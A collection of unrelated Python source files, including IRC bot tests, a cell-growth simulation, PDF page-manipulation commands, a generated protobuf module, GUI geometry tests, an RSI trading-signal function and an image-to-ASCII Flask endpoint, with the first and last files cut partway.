ircdb.users.setUser(u)
self.assertNotError('capability add foo bar')
self.assertError('addcapability foo baz')
self.assert_('bar' in u.capabilities)
ircdb.users.delUser(u.id)
def testCapabilityRemove(self):
self.assertError('capability remove foo bar')
u = ircdb.users.newUser()
u.name = 'foo'
ircdb.users.setUser(u)
self.assertNotError('capability add foo bar')
self.assert_('bar' in u.capabilities)
self.assertError('removecapability foo bar')
self.assertNotError('capability remove foo bar')
self.assert_(not 'bar' in u.capabilities)
ircdb.users.delUser(u.id)
def testJoin(self):
m = self.getMsg('join #foo')
self.assertEqual(m.command, 'JOIN')
self.assertEqual(m.args[0], '#foo')
m = self.getMsg('join #foo key')
self.assertEqual(m.command, 'JOIN')
self.assertEqual(m.args[0], '#foo')
self.assertEqual(m.args[1], 'key')
def testPart(self):
def getAfterJoinMessages():
m = self.irc.takeMsg()
self.assertEqual(m.command, 'MODE')
m = self.irc.takeMsg()
self.assertEqual(m.command, 'WHO')
self.assertError('part #foo')
self.assertRegexp('part #foo', 'not in')
self.irc.feedMsg(ircmsgs.join('#foo', prefix=self.prefix))
getAfterJoinMessages()
m = self.getMsg('part #foo')
self.assertEqual(m.command, 'PART')
self.irc.feedMsg(ircmsgs.join('#foo', prefix=self.prefix))
getAfterJoinMessages()
m = self.getMsg('part #foo reason')
self.assertEqual(m.command, 'PART')
self.assertEqual(m.args[0], '#foo')
self.assertEqual(m.args[1], 'reason')
def testNick(self):
original = conf.supybot.nick()
try:
m = self.getMsg('nick foobar')
self.assertEqual(m.command, 'NICK')
self.assertEqual(m.args[0], 'foobar')
finally:
conf.supybot.nick.setValue(original)
def testAddCapabilityOwner(self):
self.assertError('admin capability add %s owner' % self.nick)
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
from __future__ import absolute_import, division, print_function
import os
import sys
import uuid
import argparse
from vivarium.core.experiment import (
generate_state,
Experiment
)
from vivarium.core.composition import (
make_agents,
simulate_experiment,
plot_agents_multigen,
EXPERIMENT_OUT_DIR,
)
from vivarium.plots.multibody_physics import plot_snapshots
# compartments
from vivarium.compartments.lattice import Lattice
from vivarium.compartments.growth_division import GrowthDivision
from vivarium.compartments.growth_division_minimal import GrowthDivisionMinimal
NAME = 'lattice'
def lattice_experiment(config):
# configure the experiment
n_agents = config.get('n_agents')
emitter = config.get('emitter', {'type': 'timeseries'})
# make lattice environment
environment = Lattice(config.get('environment', {}))
network = environment.generate()
processes = network['processes']
topology = network['topology']
# add the agents
agent_ids = [str(agent_id) for agent_id in range(n_agents)]
agent_config = config['agent']
agent_compartment = agent_config['compartment']
compartment_config = agent_config['config']
agent = agent_compartment(compartment_config)
agents = make_agents(agent_ids, agent, {})
processes['agents'] = agents['processes']
topology['agents'] = agents['topology']
return Experiment({
'processes': processes,
'topology': topology,
'emitter': emitter,
'initial_state': config.get('initial_state', {})})
# configs
def get_gd_config():
return {
'compartment': GrowthDivision,
'config': {
'agents_path': ('..', '..', 'agents'),
}
}
def get_gd_minimal_config():
return {
'compartment': GrowthDivisionMinimal,
'config': {
'agents_path': ('..', '..', 'agents'),
'growth_rate': 0.03,
'growth_rate_noise': 0.02,
'division_volume': 2.6
}
}
def get_lattice_config():
bounds = [20, 20]
n_bins = [10, 10]
molecules = ['glc__D_e', 'lcts_e']
environment_config = {
'multibody': {
'bounds': bounds,
'agents': {}
},
'diffusion': {
'molecules': molecules,
'n_bins': n_bins,
'bounds': bounds,
'depth': 3000.0,
'diffusion': 1e-2,
}
}
return {
'environment': environment_config}
def run_lattice_experiment(agent_config=get_gd_minimal_config, filename='agents'):
n_agents = 1
experiment_config = get_lattice_config()
experiment_config['n_agents'] = n_agents
experiment_config['agent'] = agent_config()
experiment = lattice_experiment(experiment_config)
# simulate
settings = {
'timestep': 1,
'total_time': 200,
'return_raw_data': True}
data = simulate_experiment(experiment, settings)
# extract data
multibody_config = experiment_config['environment']['multibody']
agents = {time: time_data['agents'] for time, time_data in data.items()}
fields = {time: time_data['fields'] for time, time_data in data.items()}
# agents plot
plot_settings = {
'agents_key': 'agents'}
plot_agents_multigen(data, plot_settings, out_dir, filename)
# snapshot plot
data = {
'agents': agents,
'fields': fields,
'config': multibody_config}
plot_config = {
'out_dir': out_dir,
'filename': filename + '_snapshots'}
plot_snapshots(data, plot_config)
if __name__ == '__main__':
out_dir = os.path.join(EXPERIMENT_OUT_DIR, NAME)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
parser = argparse.ArgumentParser(description='lattice_experiment')
parser.add_argument('--gd', '-g', action='store_true', default=False)
parser.add_argument('--gd_minimal', '-m', action='store_true', default=False)
args = parser.parse_args()
no_args = (len(sys.argv) == 1)
if args.gd_minimal or no_args:
run_lattice_experiment(get_gd_minimal_config, 'minimal_growth_division')
elif args.gd:
run_lattice_experiment(get_gd_config, 'growth_division')
|
# -*- coding: utf-8 -*-
"""Toolcall exception hierarchy.
"""
class ToolcallException(Exception):
"""Toolcall exception base class.
"""
class ToolcallInvalidResponse(ToolcallException):
"""Something other than a 200 OK response.
"""
class ToolcallJSonDecodeError(ToolcallException):
"""Couldn't decode json value.
"""
class ToolcallMessageException(ToolcallException):
"""Generic message error.
"""
class ToolcallResultException(ToolcallMessageException):
"""Something is wrong with the result.
"""
|
"""Module containing the actual commands stapler understands."""
import math
import os
try:
from PyPDF2 import PdfFileWriter, PdfFileReader
except:
from pyPdf import PdfFileWriter, PdfFileReader
import more_itertools
from . import CommandError, iohelper
import staplelib
def select(args, inverse=False, even_page=False):
"""
Concatenate files / select pages from files.
inverse=True excludes rather than includes the selected pages from
the file.
even_page=True inserts an empty page at the end of each input
file if it ends with an odd page number.
"""
filesandranges = iohelper.parse_ranges(args[:-1])
outputfilename = args[-1]
verbose = staplelib.OPTIONS.verbose
if not filesandranges or not outputfilename:
raise CommandError("Both input and output filenames are required.")
output = PdfFileWriter()
pagecnt = 0
try:
for input in filesandranges:
pdf = input['pdf']
if verbose:
print input['name']
# empty range means "include all pages"
if not inverse:
pagerange = input['pages'] or [
(p, iohelper.ROTATION_NONE) for p in
range(1, pdf.getNumPages() + 1)]
else:
excluded = [p for p, r in input['pages']]
pagerange = [(p, iohelper.ROTATION_NONE) for p in
range(1, pdf.getNumPages() + 1) if
p not in excluded]
for pageno, rotate in pagerange:
if 1 <= pageno <= pdf.getNumPages():
if verbose:
print "Using page: {} (rotation: {} deg.)".format(
pageno, rotate)
page = pdf.getPage(pageno-1)
output.addPage(page.rotateClockwise(rotate))
pagecnt += 1
else:
raise CommandError("Page {} not found in {}.".format(
pageno, input['name']))
if even_page:
if pagecnt % 2 == 1:
output.addPage(iohelper.create_empty_page(page))
pagecnt += 1
except Exception, e:
raise CommandError(e)
if os.path.isabs(outputfilename):
iohelper.write_pdf(output, outputfilename)
else:
iohelper.write_pdf(output, staplelib.OPTIONS.destdir +
os.sep + outputfilename)
def select_even(args, inverse=False):
"""
Concatenate files / select pages from files.
Inserts an empty page at the end of each input file if it ends with
an odd page number.
"""
select(args, inverse, True)
def delete(args):
"""Concatenate files and remove pages from files."""
return select(args, inverse=True)
def split(args):
"""Burst an input file into one file per page."""
files = args
verbose = staplelib.OPTIONS.verbose
if not files:
raise CommandError("No input files specified.")
inputs = []
try:
for f in files:
inputs.append(iohelper.read_pdf(f))
except Exception, e:
raise CommandError(e)
filecount = 0
pagecount = 0
for input in inputs:
# zero-padded output file name
(base, ext) = os.path.splitext(os.path.basename(files[filecount]))
output_template = ''.join([
base,
'_',
'%0',
str(math.ceil(math.log10(input.getNumPages()))),
'd',
ext
])
for pageno in range(input.getNumPages()):
output = PdfFileWriter()
output.addPage(input.getPage(pageno))
outputname = output_template % (pageno + 1)
if verbose:
print outputname
iohelper.write_pdf(output, staplelib.OPTIONS.destdir +
os.sep + outputname)
pagecount += 1
filecount += 1
if verbose:
print "\n{} page(s) in {} file(s) processed.".format(
pagecount, filecount)
def info(args):
"""Display Metadata content for all input files."""
files = args
if not files:
raise CommandError("No input files specified.")
for f in files:
pdf = iohelper.read_pdf(f)
print "*** Metadata for {}".format(f)
print
info = pdf.documentInfo
if info:
for name, value in info.items():
print u" {}: {}".format(name, value)
else:
print " (No metadata found.)"
print
def zip(args):
"""Combine 2 files with interleaved pages."""
filesandranges = iohelper.parse_ranges(args[:-1])
outputfilename = args[-1]
verbose = staplelib.OPTIONS.verbose
if not filesandranges or not outputfilename:
raise CommandError('Both input and output filenames are required.')
# Make [[file1_p1, file1_p2], [file2_p1, file2_p2], ...].
filestozip = []
for input in filesandranges:
pdf = input['pdf']
if verbose:
print input['name']
# Empty range means "include all pages".
pagerange = input['pages'] or [
(p, iohelper.ROTATION_NONE) for p in
range(1, pdf.getNumPages() + 1)]
pagestozip = []
for pageno, rotate in pagerange:
if 1 <= pageno <= pdf.getNumPages():
if verbose:
print "Using page: {} (rotation: {} deg.)".format(
pageno, rotate)
pagestozip.append(
pdf.getPage(pageno - 1).rotateClockwise(rotate))
else:
raise CommandError("Page {} not found in {}.".format(
pageno, input['name']))
filestozip.append(pagestozip)
# Interweave pages.
output = PdfFileWriter()
for page in more_itertools.roundrobin(*filestozip):
output.addPage(page)
if os.path.isabs(outputfilename):
iohelper.write_pdf(output, outputfilename)
else:
iohelper.write_pdf(output, staplelib.OPTIONS.destdir +
os.sep + outputfilename)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: modules/tools/fuzz/third_party_perception/proto/third_party_perception_fuzz.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from modules.drivers.proto import mobileye_pb2 as modules_dot_drivers_dot_proto_dot_mobileye__pb2
from modules.canbus.proto import chassis_pb2 as modules_dot_canbus_dot_proto_dot_chassis__pb2
from modules.drivers.proto import delphi_esr_pb2 as modules_dot_drivers_dot_proto_dot_delphi__esr__pb2
from modules.drivers.proto import conti_radar_pb2 as modules_dot_drivers_dot_proto_dot_conti__radar__pb2
from modules.localization.proto import localization_pb2 as modules_dot_localization_dot_proto_dot_localization__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='modules/tools/fuzz/third_party_perception/proto/third_party_perception_fuzz.proto',
package='apollo.tools.fuzz.third_party_perception',
syntax='proto2',
serialized_pb=_b('\nQmodules/tools/fuzz/third_party_perception/proto/third_party_perception_fuzz.proto\x12(apollo.tools.fuzz.third_party_perception\x1a$modules/drivers/proto/mobileye.proto\x1a\"modules/canbus/proto/chassis.proto\x1a&modules/drivers/proto/delphi_esr.proto\x1a\'modules/drivers/proto/conti_radar.proto\x1a-modules/localization/proto/localization.proto\"\xa0\x02\n\x1fThirdPartyPerceptionFuzzMessage\x12*\n\x08mobileye\x18\x01 \x02(\x0b\x32\x18.apollo.drivers.Mobileye\x12\'\n\x07\x63hassis\x18\x02 \x02(\x0b\x32\x16.apollo.canbus.Chassis\x12-\n\ndelphi_esr\x18\x03 \x02(\x0b\x32\x19.apollo.drivers.DelphiESR\x12/\n\x0b\x63onti_radar\x18\x04 \x02(\x0b\x32\x1a.apollo.drivers.ContiRadar\x12H\n\x15localization_estimate\x18\x05 \x02(\x0b\x32).apollo.localization.LocalizationEstimate')
,
dependencies=[modules_dot_drivers_dot_proto_dot_mobileye__pb2.DESCRIPTOR,modules_dot_canbus_dot_proto_dot_chassis__pb2.DESCRIPTOR,modules_dot_drivers_dot_proto_dot_delphi__esr__pb2.DESCRIPTOR,modules_dot_drivers_dot_proto_dot_conti__radar__pb2.DESCRIPTOR,modules_dot_localization_dot_proto_dot_localization__pb2.DESCRIPTOR,])
_THIRDPARTYPERCEPTIONFUZZMESSAGE = _descriptor.Descriptor(
name='ThirdPartyPerceptionFuzzMessage',
full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mobileye', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.mobileye', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chassis', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.chassis', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='delphi_esr', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.delphi_esr', index=2,
number=3, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='conti_radar', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.conti_radar', index=3,
number=4, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='localization_estimate', full_name='apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage.localization_estimate', index=4,
number=5, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=330,
serialized_end=618,
)
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['mobileye'].message_type = modules_dot_drivers_dot_proto_dot_mobileye__pb2._MOBILEYE
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['chassis'].message_type = modules_dot_canbus_dot_proto_dot_chassis__pb2._CHASSIS
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['delphi_esr'].message_type = modules_dot_drivers_dot_proto_dot_delphi__esr__pb2._DELPHIESR
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['conti_radar'].message_type = modules_dot_drivers_dot_proto_dot_conti__radar__pb2._CONTIRADAR
_THIRDPARTYPERCEPTIONFUZZMESSAGE.fields_by_name['localization_estimate'].message_type = modules_dot_localization_dot_proto_dot_localization__pb2._LOCALIZATIONESTIMATE
DESCRIPTOR.message_types_by_name['ThirdPartyPerceptionFuzzMessage'] = _THIRDPARTYPERCEPTIONFUZZMESSAGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ThirdPartyPerceptionFuzzMessage = _reflection.GeneratedProtocolMessageType('ThirdPartyPerceptionFuzzMessage', (_message.Message,), dict(
DESCRIPTOR = _THIRDPARTYPERCEPTIONFUZZMESSAGE,
__module__ = 'modules.tools.fuzz.third_party_perception.proto.third_party_perception_fuzz_pb2'
# @@protoc_insertion_point(class_scope:apollo.tools.fuzz.third_party_perception.ThirdPartyPerceptionFuzzMessage)
))
_sym_db.RegisterMessage(ThirdPartyPerceptionFuzzMessage)
# @@protoc_insertion_point(module_scope)
|
import math
from TestKit import *
from UnderGUI.Commons import *
from lxml.html.builder import FONT
__all__ = ['test_commons']
def test_commons():
### Pos ###
pos = Pos(1, 2)
assert pos.x == 1 and pos.y == 2
assert Pos(1, 2) == Pos(1, 2)
assert (Pos(1, 2) == Pos(1, 3)) == False
assert (Pos(1, 2) == Pos(5, 2)) == False
assert (Pos(1, 2) == Pos(2, 1)) == False
assert (Pos(1, 2) != Pos(1, 2)) == False
assert Pos(1, 2) != Pos(1, 3)
assert Pos(1, 2) != Pos(5, 2)
assert Pos(1, 2) != Pos(2, 1)
assert Pos(2, 3) * Pos(10, 100) == Pos(20, 300)
assert Pos(20, 300) / Pos(10, 100) == Pos(2, 3)
assert Pos(40, 50) + Pos(1, 2) == Pos(41, 52)
assert Pos(40, 50) - Pos(1, 2) == Pos(39, 48)
assert Pos(20, 30) / 10 == Pos(2, 3)
assert Pos(2, 3) * 10 == Pos(20, 30)
assert Pos(40, 50) + 2 == Pos(42, 52)
assert Pos(40, 50) - 2 == Pos(38, 48)
assert (Pos(2, 5) < Pos(3, 6)) == True
assert (Pos(2, 5) < Pos(2, 6)) == False
assert (Pos(2, 5) < Pos(3, 5)) == False
assert (Pos(2, 5) < Pos(2, 5)) == False
assert (Pos(2, 5) < Pos(1, 5)) == False
assert (Pos(2, 5) < Pos(2, 4)) == False
assert (Pos(2, 5) < Pos(1, 4)) == False
assert (Pos(2, 5) <= Pos(3, 6)) == True
assert (Pos(2, 5) <= Pos(2, 6)) == True
assert (Pos(2, 5) <= Pos(3, 5)) == True
assert (Pos(2, 5) <= Pos(2, 5)) == True
assert (Pos(2, 5) <= Pos(1, 5)) == False
assert (Pos(2, 5) <= Pos(2, 4)) == False
assert (Pos(2, 5) <= Pos(1, 4)) == False
assert (Pos(3, 6) > Pos(2, 5)) == True
assert (Pos(3, 6) > Pos(3, 5)) == False
assert (Pos(3, 6) > Pos(2, 6)) == False
assert (Pos(3, 6) > Pos(3, 6)) == False
assert (Pos(3, 6) > Pos(3, 7)) == False
assert (Pos(3, 6) > Pos(4, 6)) == False
assert (Pos(3, 6) > Pos(4, 7)) == False
assert (Pos(3, 6) >= Pos(2, 5)) == True
assert (Pos(3, 6) >= Pos(3, 5)) == True
assert (Pos(3, 6) >= Pos(2, 6)) == True
assert (Pos(3, 6) >= Pos(3, 6)) == True
assert (Pos(3, 6) >= Pos(3, 7)) == False
assert (Pos(3, 6) >= Pos(4, 6)) == False
assert (Pos(3, 6) >= Pos(4, 7)) == False
### Size ###
size = Size(1, 2)
assert size.width == 1 and size.height == 2
assert Size(1, 2) == Size(1, 2)
assert (Size(1, 2) == Size(1, 3)) == False
assert (Size(1, 2) == Size(5, 2)) == False
assert (Size(1, 2) == Size(2, 1)) == False
assert (Size(1, 2) != Size(1, 2)) == False
assert Size(1, 2) != Size(1, 3)
assert Size(1, 2) != Size(5, 2)
assert Size(1, 2) != Size(2, 1)
assert Size(2, 3) * Size(10, 100) == Size(20, 300)
assert Size(20, 300) / Size(10, 100) == Size(2, 3)
assert Size(40, 50) + Size(1, 2) == Size(41, 52)
assert Size(40, 50) - Size(1, 2) == Size(39, 48)
assert Size(20, 30) / 10 == Size(2, 3)
assert Size(2, 3) * 10 == Size(20, 30)
assert Size(40, 50) + 2 == Size(42, 52)
assert Size(40, 50) - 2 == Size(38, 48)
assert (Size(2, 5) < Size(3, 6)) == True
assert (Size(2, 5) < Size(2, 6)) == False
assert (Size(2, 5) < Size(3, 5)) == False
assert (Size(2, 5) < Size(2, 5)) == False
assert (Size(2, 5) < Size(1, 5)) == False
assert (Size(2, 5) < Size(2, 4)) == False
assert (Size(2, 5) < Size(1, 4)) == False
assert (Size(2, 5) <= Size(3, 6)) == True
assert (Size(2, 5) <= Size(2, 6)) == True
assert (Size(2, 5) <= Size(3, 5)) == True
assert (Size(2, 5) <= Size(2, 5)) == True
assert (Size(2, 5) <= Size(1, 5)) == False
assert (Size(2, 5) <= Size(2, 4)) == False
assert (Size(2, 5) <= Size(1, 4)) == False
assert (Size(3, 6) > Size(2, 5)) == True
assert (Size(3, 6) > Size(3, 5)) == False
assert (Size(3, 6) > Size(2, 6)) == False
assert (Size(3, 6) > Size(3, 6)) == False
assert (Size(3, 6) > Size(3, 7)) == False
assert (Size(3, 6) > Size(4, 6)) == False
assert (Size(3, 6) > Size(4, 7)) == False
assert (Size(3, 6) >= Size(2, 5)) == True
assert (Size(3, 6) >= Size(3, 5)) == True
assert (Size(3, 6) >= Size(2, 6)) == True
assert (Size(3, 6) >= Size(3, 6)) == True
assert (Size(3, 6) >= Size(3, 7)) == False
assert (Size(3, 6) >= Size(4, 6)) == False
assert (Size(3, 6) >= Size(4, 7)) == False
### Pos and Size ###
assert Pos(2, 3) * Size(10, 100) == Pos(20, 300)
assert Pos(20, 300) / Size(10, 100) == Pos(2, 3)
assert Pos(40, 50) + Size(1, 2) == Pos(41, 52)
assert Pos(40, 50) - Size(1, 2) == Pos(39, 48)
assert Pos(1, 2).to_size() == Size(1, 2)
assert Size(1, 2).to_pos() == Pos(1, 2)
### Range ###
range = Range(1, 2, 3, 4)
assert range.x1 == 1 and range.y1 == 2 and range.x2 == 3 and range.y2 == 4
assert range.get_from_pos() == Pos(1, 2)
assert range.get_to_pos() == Pos(3, 4)
assert Range(0, 1, 2, 3) == Range(0, 1, 2, 3)
assert (Range(0, 1, 2, 3) == Range(10, 1, 2, 3)) == False
assert (Range(0, 1, 2, 3) == Range(0, 11, 2, 3)) == False
assert (Range(0, 1, 2, 3) == Range(1, 1, 12, 3)) == False
assert (Range(0, 1, 2, 3) == Range(1, 1, 2, 13)) == False
assert (Range(0, 1, 2, 3) != Range(0, 1, 2, 3)) == False
assert Range(0, 1, 2, 3) != Range(10, 1, 2, 3)
assert Range(0, 1, 2, 3) != Range(0, 11, 2, 3)
assert Range(0, 1, 2, 3) != Range(1, 1, 12, 3)
assert Range(0, 1, 2, 3) != Range(1, 1, 2, 13)
assert (Range(5, 2, 3, 4) * Range(10, 100, 1000, 10000)) == Range(50, 200, 3000, 40000)
assert (Range(6, 20, 60, 3000) / Range(2, 5, 10, 100)) == Range(3, 4, 6, 30)
assert (Range(6.0, 20.0, 60.0, 3000.0) / Range(2.0, 5.0, 10.0, 100.0)) == Range(3.0, 4.0, 6.0, 30.0)
assert (Range(5, 2, 3, 4) + Range(10, 100, 1000, 10000)) == Range(15, 102, 1003, 10004)
assert (Range(10, 20, 30, 40) - Range(1, 2, 3, 4)) == Range(9, 18, 27, 36)
assert (Range(1, 2, 3, 4) * 10) == Range(10, 20, 30, 40)
assert (Range(10, 20, 30, 40) / 10) == Range(1, 2, 3, 4)
assert (Range(10.0, 20.0, 30.0, 40.0) / 10.0) == Range(1.0, 2.0, 3.0, 4.0)
assert (Range(1, 2, 3, 4) + 10) == Range(11, 12, 13, 14)
assert (Range(10, 20, 30, 40) - 1) == Range(9, 19, 29, 39)
assert Range(3, 5, 10, 20).is_in(Pos(3, 5)) == True
assert Range(3, 5, 10, 20).is_in(Pos(4, 6)) == True
assert Range(3, 5, 10, 20).is_in(Pos(9, 19)) == True
assert Range(3, 5, 10, 20).is_in(Pos(2, 5)) == False
assert Range(3, 5, 10, 20).is_in(Pos(3, 4)) == False
assert Range(3, 5, 10, 20).is_in(Pos(2, 4)) == False
assert Range(3, 5, 10, 20).is_in(Pos(9, 20)) == False
assert Range(3, 5, 10, 20).is_in(Pos(10, 19)) == False
assert Range(3, 5, 10, 20).is_in(Pos(10, 20)) == False
assert RangeF(0, 1, 2, 3) == Range(0.0, 1.0, 2.0, 3.0)
assert RangeI(0.1, 1.1, 2.1, 3.1) == Range(0, 1, 2, 3)
assert RangePP(Pos(0, 1), Pos(2, 3)) == Range(0, 1, 2, 3)
assert RangeF(0.1, 1.1, 2.1, 3.1).to_range_i() == RangeI(0, 1, 2, 3)
assert RangeI(0, 1, 2, 3).to_range_f() == RangeF(0, 1, 2, 3)
assert Range(10, 20, 30, 40) / Size(10, 5) == Range(1, 4, 3, 8)
assert Range(10, 20, 30, 40).get_normalized(10, 5) == Range(1, 4, 3, 8)
assert Range(10, 20, 30, 40).get_normalized_s(Size(10, 5)) == Range(1, 4, 3, 8)
assert Range(1, 2, 3, 4).to_tuple() == (1, 2, 3, 4)
assert Range(1, 2, 3, 4).to_dict() == {'x1' : 1, 'y1' : 2, 'x2' : 3, 'y2' : 4}
range = Range(1, 2, 3, 4)
range.flip_on_x_axis(10)
assert range == Range(1, 6, 3, 8)
range.flip_on_y_axis(10)
assert range == Range(7, 6, 9, 8)
### Area ###
area = Area(1, 2, 3, 4)
assert area.x == 1 and area.y == 2 and area.width == 3 and area.height == 4
assert area.get_pos() == Pos(1, 2)
assert area.get_size() == Size(3, 4)
area.set_pos(Pos(10, 20))
assert area.x == 10 and area.y == 20 and area.width == 3 and area.height == 4
area.set_size(Size(30, 40))
assert area.x == 10 and area.y == 20 and area.width == 30 and area.height == 40
assert Area(0, 1, 2, 3) == Area(0, 1, 2, 3)
assert (Area(0, 1, 2, 3) == Area(10, 1, 2, 3)) == False
assert (Area(0, 1, 2, 3) == Area(0, 11, 2, 3)) == False
assert (Area(0, 1, 2, 3) == Area(1, 1, 12, 3)) == False
assert (Area(0, 1, 2, 3) == Area(1, 1, 2, 13)) == False
assert (Area(0, 1, 2, 3) != Area(0, 1, 2, 3)) == False
assert Area(0, 1, 2, 3) != Area(10, 1, 2, 3)
assert Area(0, 1, 2, 3) != Area(0, 11, 2, 3)
assert Area(0, 1, 2, 3) != Area(1, 1, 12, 3)
assert Area(0, 1, 2, 3) != Area(1, 1, 2, 13)
assert Area(3, 5, 7, 15).is_in(Pos(3, 5)) == True
assert Area(3, 5, 7, 15).is_in(Pos(4, 6)) == True
assert Area(3, 5, 7, 15).is_in(Pos(9, 19)) == True
assert Area(3, 5, 7, 15).is_in(Pos(2, 5)) == False
assert Area(3, 5, 7, 15).is_in(Pos(3, 4)) == False
assert Area(3, 5, 7, 15).is_in(Pos(2, 4)) == False
assert Area(3, 5, 7, 15).is_in(Pos(9, 20)) == False
assert Area(3, 5, 7, 15).is_in(Pos(10, 19)) == False
assert Area(3, 5, 7, 15).is_in(Pos(10, 20)) == False
assert Area(1, 2, 3, 4) + Pos(10, 20) == Area(11, 22, 3, 4)
assert Area(1, 2, 3, 4) + Size(10, 20) == Area(1, 2, 13, 24)
assert Area(1, 2, 3, 4).to_tuple() == (1, 2, 3, 4)
assert Area(1, 2, 3, 4).to_dict() == {'x' : 1, 'y' : 2, 'width' : 3, 'height' : 4}
### Area and Range ###
assert Area(1, 2, 10, 20).to_range() == Range(1, 2, 11, 22)
assert Range(1, 2, 11, 22).to_area() == Area(1, 2, 10, 20)
### FontInfo ###
font_info = FontInfo("Courier New", 22, FontStyle.ITALIC, SizeUnit.POINT)
assert font_info.name == "Courier New"
assert font_info.size == 22
assert font_info.style == FontStyle.ITALIC
assert font_info.size_unit == SizeUnit.POINT
### FontData ###
font_data = FontData()
assert font_data.texture_data.data == b''
assert font_data.texture_data.pixel_format == PixelFormat.UNKNOWN
assert font_data.texture_data.size == Size(0, 1)
assert font_data.texture_glyph_infos == {}
assert font_data.max_glyph_height == 0
font_data = FontData(TextureData(b'abc', PixelFormat.RGBA, Size(12, 13)), {4 : (1.0, 2.0, 3.0, 4.0)}, 10)
assert font_data.texture_data.data == b'abc'
assert font_data.texture_data.pixel_format == PixelFormat.RGBA
assert font_data.texture_data.size == Size(12, 13)
assert font_data.texture_glyph_infos == {4 : (1.0, 2.0, 3.0, 4.0)}
assert font_data.max_glyph_height == 10
### FontSource ###
font_source = FontSource("a", "b", "c", "d")
assert font_source.normal_url == "a"
assert font_source.bold_url == "b"
assert font_source.italic_url == "c"
assert font_source.bold_and_italic_url == "d"
### FontSourceRegister ###
register = FontSourceRegister()
assert register.get("x", FontStyle.BOLD) == ""
register.add("x", FontSource("a", "b", "c", "d"))
register.add("y", FontSource(normal_url = "a2", bold_url = "b2", italic_url = "c2", bold_and_italic_url = "d2"))
assert register.get("x", FontStyle.BOLD) == "b"
assert register.get("y", FontStyle.NORMAL) == "a2"
assert register.get("y", FontStyle.BOLD) == "b2"
assert register.get("y", FontStyle.ITALIC) == "c2"
assert register.get("y", FontStyle.BOLD_AND_ITALIC) == "d2"
assert register.get("y", 100) == ""
### GlyphCodeBlock ###
glyph_code_block = GlyphCodeBlock(10, 20)
assert glyph_code_block.first == 10
assert glyph_code_block.last == 20
glyph_code_block_group = GlyphCodeBlockGroup(GlyphCodeBlock(10, 20)) + GlyphCodeBlockGroup(GlyphCodeBlock(21, 30), GlyphCodeBlock(31, 40))
assert glyph_code_block_group.blocks[0].first == 10
assert glyph_code_block_group.blocks[0].last == 20
assert glyph_code_block_group.blocks[1].first == 21
assert glyph_code_block_group.blocks[1].last == 30
assert glyph_code_block_group.blocks[2].first == 31
assert glyph_code_block_group.blocks[2].last == 40
if __name__ == "__main__":
run_test(test_commons)
|
import numpy as np
def rsiDBcross(rsi1, rsi2):
states = np.zeros(len(rsi2))
bought = 1
sold = 1
states[0] = 0
for i in range(len(rsi1)-1):
if(rsi2[i+1]>rsi1[i+1]):
if (rsi2[i+1] - rsi1[i+1] > 5) & sold == 1:
states[i+1] = 0
bought = 1
sold = 0
elif (states[i] == 0) & (rsi2[i+1] - rsi1[i+1] > 5):
states[i+1] = 0
else:
states[i+1] = 1
else:
if(rsi1[i+1] - rsi2[i+1] > 2) & (bought == 1):
states[i+1] = 2
bought = 0
sold = 1
elif (states[i] == 2) & (rsi1[i+1] - rsi2[i+1] > 5):
states[i+1] = 2
else:
states[i+1] = 1
return states
|
#!/usr/bin/env python
from flask import Flask
from flask import request
import image_pb2 as impb
from PIL import Image
import io
import imutils
import cv2
app = Flask(__name__)
@app.route('/invocations', methods = ['POST'])
def index():
data = request.data
# Read the existing image.
image_packet = impb.Image()
image_packet.ParseFromString(data)
with open('picture_out_for.jpg', 'wb') as f:
f.write(image_packet.image_data)
f.close()
img = Image.open('picture_out_for.jpg')
# resize the image
width, height = img.size
aspect_ratio = height / width
new_width = 120
new_height = aspect_ratio * new_width * 0.55
img = img.resize((new_width, int(new_height)))
# new size of image
# print(img.size)
# convert image to greyscale format
img = img.convert('L')
pixels = img.getdata()
# replace each pixel with a character from array
chars = ["B", "S", "#", "&", "@", "$", "%", "*", "!", ":", "."]
new_pixels = [chars[pixel // 25] for pixel in pixels]
new_pixels = ''.join(new_pixels)
